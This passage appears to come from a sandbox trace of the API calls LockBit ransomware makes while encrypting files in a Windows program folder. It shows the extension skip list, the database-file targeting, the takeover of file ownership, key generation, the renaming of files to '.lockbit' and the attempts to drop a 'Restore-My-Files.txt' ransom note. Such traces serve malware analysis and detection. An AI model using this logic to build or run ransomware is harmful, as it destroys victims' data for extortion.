"c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.129] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ede1450, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ede1450, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c7063e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf26, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Circle_SelectionSubpictureA.png", cAlternateFileName="")) returned 1 [0080.129] lstrcmpiW (lpString1=".", lpString2="Circle_SelectionSubpictureA.png") returned -1 [0080.129] lstrcmpiW (lpString1="..", lpString2="Circle_SelectionSubpictureA.png") returned -1 [0080.129] PathFindExtensionW (pszPath="Circle_SelectionSubpictureA.png") returned=".png" [0080.129] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.129] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.129] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.129] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.130] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.130] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.130] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.130] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.131] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.131] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.131] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.131] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.131] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.131] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.131] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.131] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.131] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.132] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Circle_SelectionSubpictureA.png") returned 1 [0080.132] lstrcmpiW (lpString1="ntldr", lpString2="Circle_SelectionSubpictureA.png") returned 1 [0080.132] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Circle_SelectionSubpictureA.png") returned 1 [0080.132] lstrcmpiW (lpString1="bootsect.bak", lpString2="Circle_SelectionSubpictureA.png") returned -1 [0080.132] lstrcmpiW (lpString1="autorun.inf", lpString2="Circle_SelectionSubpictureA.png") returned -1 [0080.132] lstrcmpiW (lpString1="thumbs.db", lpString2="Circle_SelectionSubpictureA.png") returned 1 [0080.132] lstrcmpiW (lpString1="iconcache.db", lpString2="Circle_SelectionSubpictureA.png") returned 1 [0080.132] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.132] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png") returned=".png" [0080.132] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.132] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.132] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.132] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.132] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.132] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.132] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.132] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.132] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.132] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.132] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.133] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.133] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.133] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.133] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.133] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.133] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.133] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.133] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.133] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.133] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.133] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.133] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.133] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.133] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.133] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.133] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.133] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.133] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.lockbit") returned 84 [0080.133] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpicturea.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.134] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.134] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.134] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.135] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.135] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.135] RtlFreeAnsiString (AnsiString="\\") [0080.135] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3c0) returned 0x0 [0080.135] malloc (_Size=0x200) returned 0x77d800 [0080.135] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.135] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.135] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.135] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.136] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.136] CloseHandle (hObject=0x3c0) returned 1 [0080.136] free (_Block=0x77d800) [0080.136] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpicturea.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0080.136] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.136] malloc (_Size=0x40068) returned 0x3df0008 [0080.136] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3878) returned 1 [0080.136] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.137] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0080.137] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.138] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0080.138] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0080.202] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.202] malloc (_Size=0xbe) returned 0x1ff1e60 [0080.202] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0080.203] free (_Block=0x1ff1e60) [0080.203] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.203] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.203] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.203] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ede1450, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ede1450, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c7063e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc8f, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Circle_SelectionSubpictureB.png", cAlternateFileName="")) returned 1 [0080.204] lstrcmpiW (lpString1=".", lpString2="Circle_SelectionSubpictureB.png") returned -1 [0080.204] lstrcmpiW (lpString1="..", lpString2="Circle_SelectionSubpictureB.png") returned -1 [0080.204] PathFindExtensionW (pszPath="Circle_SelectionSubpictureB.png") returned=".png" [0080.204] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.204] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.204] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.204] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.204] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.205] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.205] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.205] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.205] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.205] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.205] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.205] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.205] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.205] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Circle_SelectionSubpictureB.png") returned 1 [0080.205] lstrcmpiW (lpString1="ntldr", lpString2="Circle_SelectionSubpictureB.png") returned 1 [0080.206] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Circle_SelectionSubpictureB.png") returned 1 [0080.206] lstrcmpiW (lpString1="bootsect.bak", lpString2="Circle_SelectionSubpictureB.png") returned -1 [0080.206] lstrcmpiW (lpString1="autorun.inf", lpString2="Circle_SelectionSubpictureB.png") returned -1 [0080.206] lstrcmpiW (lpString1="thumbs.db", lpString2="Circle_SelectionSubpictureB.png") returned 1 [0080.206] lstrcmpiW (lpString1="iconcache.db", lpString2="Circle_SelectionSubpictureB.png") returned 1 [0080.206] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.206] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png") returned=".png" [0080.206] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.206] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.206] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.206] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.207] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.207] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.207] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.207] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.207] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.207] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.207] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.207] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.207] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.207] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.207] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.lockbit") returned 84 [0080.207] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpictureb.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.209] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.209] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.209] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.209] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.209] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.209] RtlFreeAnsiString (AnsiString="\\") [0080.209] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3ac) returned 0x0 [0080.210] malloc (_Size=0x200) returned 0x77d800 [0080.210] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.210] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.210] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.210] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.212] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.213] CloseHandle (hObject=0x3ac) returned 1 [0080.213] free (_Block=0x77d800) [0080.213] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpictureb.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0080.213] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.213] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.213] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3215) returned 1 [0080.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.214] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.222] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.222] malloc (_Size=0xbe) returned 0x1ff1e60 [0080.222] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xbe, FileInformationClass=0xa) returned 0xc0000008 [0080.222] free (_Block=0x1ff1e60) [0080.222] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.222] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.223] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.223] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee2d70a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee2d70a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13c3, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Circle_VideoInset.png", cAlternateFileName="")) returned 1 [0080.223] lstrcmpiW (lpString1=".", lpString2="Circle_VideoInset.png") returned -1 [0080.223] lstrcmpiW (lpString1="..", lpString2="Circle_VideoInset.png") returned -1 [0080.223] PathFindExtensionW (pszPath="Circle_VideoInset.png") returned=".png" [0080.223] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.223] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.223] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.223] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.223] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.223] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.223] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.223] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.223] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.223] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.223] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 